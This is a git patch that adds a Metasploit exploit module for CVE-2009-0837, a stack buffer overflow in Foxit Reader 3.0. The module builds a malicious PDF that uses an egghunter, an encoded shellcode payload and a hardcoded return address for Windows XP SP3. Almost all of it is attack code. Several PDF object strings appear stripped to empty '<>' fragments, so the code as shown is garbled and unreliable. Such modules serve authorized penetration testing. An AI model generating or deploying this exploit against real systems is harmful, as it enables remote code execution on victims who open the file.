From 086af94b5ded912aed2cba85a58b5fb546780fc3 Mon Sep 17 00:00:00 2001
From: David Rude
Date: Tue, 25 Oct 2011 20:15:12 +0000
Subject: [PATCH] Adds Foxit PDF Reader Exploit CVE-2009-0837
git-svn-id: file:///home/svn/framework3/trunk@14069 4d416f70-5f16-0410-b530-b9f4589650da
---
 .../fileformat/foxit_pdf_action_bof.rb | 113 ++++++++++++++++++
 1 file changed, 113 insertions(+)
 create mode 100644 modules/exploits/windows/fileformat/foxit_pdf_action_bof.rb
diff --git a/modules/exploits/windows/fileformat/foxit_pdf_action_bof.rb b/modules/exploits/windows/fileformat/foxit_pdf_action_bof.rb
new file mode 100644
index 0000000000..916f7d6097
--- /dev/null
+++ b/modules/exploits/windows/fileformat/foxit_pdf_action_bof.rb
@@ -0,0 +1,113 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+require 'zlib'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = GoodRanking
+
+ include Msf::Exploit::FILEFORMAT
+ include Msf::Exploit::PDF
+ include Msf::Exploit::Egghunter
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Foxit Reader 3.0 Open Execute Action Stack Based Buffer Overflow',
+ 'Description' => %q{
+ This module exploits a stack based buffer overflow in Foxit Reader 3.0 builds 1301 and earlier.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'bannedit', # Metasploit module
+ ],
+ 'Version' => '$Revision$',
+ 'References' =>
+ [
+ [ 'CVE' , '2009-0837' ],
+ [ 'OSVDB', '55614' ],
+ [ 'BID', '34035'],
+ [ 'URL', 'http://www.coresecurity.com/content/foxit-reader-vulnerabilities'],
+ ],
+ 'DefaultOptions' =>
+ {
+ 'EXITFUNC' => 'process',
+ 'DisablePayloadHandler' => 'true',
+ },
+ 'Payload' =>
+ {
+ 'Space' => 316,
+ 'BadChars' => "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0d\x22\x28\x29\x2F\x5c\x3c\x3e\x5e\x7e"
+ },
+ 'Platform' => 'win',
+ 'Targets' =>
+ [
+ [ 'Foxit Reader 3.0 Windows XP SP3', { 'Ret' => 0x01847e7a} ], # ebp + offset
+ ],
+ 'DisclosureDate' => 'Mar 09 2009',
+ 'DefaultTarget' => 0))
+
+ register_options([
+ OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),
+ ], self.class)
+
+ end
+
+ def exploit
+ pdf = make_pdf
+ file_create(pdf)
+ handler
+ end
+
+ def make_pdf
+ hunter, egg = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true })
+
+ action = "\n<>/NewWindow true>>"
+
+ pdf = "%PDF-1.4\n"
+ pdf << "1 0 obj\n"
+ pdf << "<>/Contents 2 0 R "
+ pdf << "/Annots[ 24 0 R 25 0 R 9 0 R ]>>\n"
+ pdf << "endobj\n"
+ pdf << "4 0 obj\n"
+ pdf << "<>\n"
+ pdf << "endobj\n"
+ pdf << "7 0 obj\n"
+ pdf << "<>\n"
+ pdf << "endobj\n"
+ pdf << "9 0 obj\n"
+ pdf << "<>/BE<>/MK<>>>/AP<>/T()/A 12 0 R /AA 17 0 R >>\n"
+ pdf << "endobj\n"
+ pdf << "16 0 obj\n"
+ pdf << action
+ pdf << "endobj\n"
+ pdf << "17 0 obj\n"
+ pdf << "<>\n"
+ pdf << "endobj\n"
+ pdf << "trailer\n"
+ pdf << "<<00000000000000000000000000000000>]"
+ pdf << "/DocChecksum/00000000000000000000000000000000/Size 31>>\n"
+ pdf << "startxref\n"
+ pdf << "0000\n"
+ pdf << "%%EOF\n"
+ pdf
+ end
+end
\ No newline at end of file